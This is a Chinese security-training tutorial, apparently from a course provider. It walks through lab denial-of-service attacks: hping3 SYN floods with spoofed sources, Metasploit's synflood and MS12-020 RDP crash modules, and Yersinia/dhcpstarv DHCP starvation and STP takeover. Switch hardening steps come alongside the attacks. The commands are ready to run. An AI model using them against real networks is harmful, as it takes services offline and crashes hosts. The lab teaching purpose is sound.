欢迎来到知了堂!
联系电话:知了堂-电话号码 028-62016472

Dos攻击奇淫技巧(二)实战Dos练习-知了堂

Dos攻击奇淫技巧(二)实战Dos练习

        本文紧接上篇文章(知了堂信息安全老师原创)作为一个渗透测试人员,有时候要对客户的系统进行DoS攻击测试,那么这时候就需要我们有一款 合格的测试工具。而kali集成了一些DoS工具。下面简单介绍一些测试工具


 

实战1:利用hping构造数据包进行DoS攻击

【实战步骤】
1.在kali中打开wireshark,监听网络数据包的传输
2.在终端输入“hping3 –S –a 1.1.1.1 --flood 192.168.111.129”其中,-S:发送SYN数据包;-a:伪造IP地址来源;--flood;只发送数据包,不考虑数据入站回显。在wireshark中监控。
3.在终端中输入命令“hping3 –S –V --flood --rand-source –c 10000 –d 150 –w 64 –p 135 192.168.111.129”其中, -V 冗余模式; --rand-source  使用随机源IP地址;-c:发送数据包数量;-d 发送每个数据包的大小;-w  TCP窗口的大小;-p 攻击目标端口 可以随意设置。在wireshark中监控。
4.在终端输入命令“hping3 -c 100000 -S --flood -p 80 -a 1.1.1.1 192.168.49.141”。在实验中,目标win7的CPU资源被大量占用。
注:Hping是用于生成和解析TCP/IP数据包的开源工具,目前最新版是hping3,hping是安全审计、防火墙测试等工作的常用工具。

实战2:使用Meteasploit进行SynFlood攻击

【实战步骤】
1.在kali主机中打开wireshark,监听网络数据包的传输。
2.Msfconsole
3.Use auxiliary/dos/tcp/synflood
4.Setrhost 192.168.111.129
5.Setrport 135
6.Set shost 61.61.61.61    //设置虚构的IP地址
7.Exploit
8.Kali中打开Wireshark监听

实战3:测试攻击DHCP服务器

Yesinia 是国外一款专门针对交换机执行第二层攻击的一个底层协议攻击的入侵检测工具,该工具主要是针对交换机上运行的一些网络协议进行攻击,如生成树协议(STP)、CDP、DHCP等。 Yesinia可以根据攻击者的需要和网络协议自身存在的漏洞,通过伪造一些特定的协议信息或协议包来实现对这些网络协议的破坏以达到攻击目的。
【实战步骤】
(1)构造DHCP服务器,把租约时间设置最短,如1分钟 。
(2)DoS攻击:对DHCP服务器发送DISCOVER包,耗尽DHCP地址池内的所有有效的IP地址。
1.在kali中输入:“yersiniadhcp-attack 1–i eth0”
2.在kali中输入:“yersinai –G”,启动图形化界面,单击“launch attack ”按钮,然后选择DHCP,有4种攻击方式:
Sending RAW packet:发送原始数据包
Sending DISCOVER packet:发送请求获取IP地址数据包,占用所有IP地址,造成拒绝服务
Creating DHCP rogue server:创建虚假DHCP服务器,让用户连接,真正的DHCP服务器无法工作
Sending RELEASE packet:发送释放IP地址请求到DHCP服务器,致使正在使用的IP地址全部失效。
这里我们现在2,win7中输入ipconfig/release 释放,1分钟后再执行ipconfig/renew,则发现命令无效,证明dhcp服务器已经被攻击并不能提供服务。
 
·yersinia stp 还有其他协议可以攻击)  -i eth0 -attack 3
 -attack 有许多默认的攻击方式
0:非DOS攻击的发送配置BPDU
1:非DOS攻击发送拓扑变更BPDU
2:DOS攻击发送配置BPDU
3:DOS攻击发送拓扑变更BPDU
4:非DOS攻击申明根桥的角色
5:非DOS攻击申明其它角色
6:DOS攻击申明根桥角色with MiTM
夺取 Root Bridge 使用-attack 4
防御
1.开启spanning tree 
spanning tree 
2.设置spanning tree 的模式 stprstpmstp
spanning tree mode stp/rstp/mstp
3.设置跟桥优先级
spanning-tree priority 0
4.show spanning tree
查看自己的配置是否是根交换机
5.在端口上开启 rootguard 设置端口不能成为根端口
SW(config-if-port-range)#spanning-tree rootguard
6.方法2 设置边缘端口 并 过滤bpdu 或者获取bpdu 关闭端口
SW(config-if-port-range)#spanning-tree portfastbpdufilter/bpduguard
bpdufilter 设置边缘端口过滤BPDU报文
bpduguard 设置边缘端口收到BPDU报文后关闭
 
·dhcp 攻击
yersinia dhcp (还有其他协议可以攻击)  -i eth0 -attack 0/1/2/3
在DHCP中实施攻击:
0:非DOS攻击发送RAW包。发送原始数据包
1:DOS攻击发送DISCOVER包  耗尽dhcp池内的ip地址
2:非DOS攻击创建DHCP流氓服务器 耗尽dhcp池类的地址 自己做dhcp地址池分配ip
3:DOS攻击发送释放包
耗尽dhcp池内的ip地址 
使用 yersinia
yersiniadhcp -i eth0 -attack 1
使用dhcpstarv
dhcpstarv -i eth0 -e 192.168.177.128
 
防御 防止dhcp地址池ip耗尽
开启ipdhcp snooping enable
ipdhcp snooping vlan 设置监听的vlan
*可选
*记录非法信息功能 ipdhcp snooping blocked record enable
*端口开启记录 ipdhcp snooping blocked record interval default
*就可以 show ip dh snooping blocked all 看见非法报文
dhcp 每秒收包数
ipdhcp snooping limit-rate 5 
设置trust口 就是连接dhcp服务器的端口
如果使用了交换机dhcp 功能 就选择一个在vlan里的端口 设置为trust口 或者起一个lo口 来设置dhcp trust口
默认交换机其他端口都为untrust 每秒收包数达到我们设置的包后 就会shutdown
抑制DHCP广播报文
ipdhcp broadcast suppress
 
防御 ipdhcp 服务器伪造
开启dhcp广播抑制 并把dhcp报文发给trust端口
ipdhcp snooping broadcast suppress
设置DHCP Snooping检测到伪装Server报文时的自定义动作
DCRS-5650(config-if-port-range)#ipdhcp snooping action shutdown

实战4:利用系统漏洞进行拒绝服务攻击
远程桌面协议(Remote Desktop Protocol,RDP)是一个多通道(multi-channel)的协议,它能让客户端连上提供微软终端机服务的服务器端。Windows在处理某些RDP报文时,Terminal Server 存在的错误可被利用造成服务停止响应。
【实战步骤】
1.Nessus扫描找到利用MS12-020漏洞 。
2.Msfconsole
3.Search ms12-020
4.Use auxiliary/dos/windows/rdp/ms12-020_maxchannelids
5.Show options
6.Set RHOST 192.168.111.129
7.Exploit
如果攻击成功则显示seems down ,被攻击win7出现蓝屏


  • 签订就业合同
  • 100%就业
  • 先就业后付款
  • 脱产班
  • 周末班
立即咨询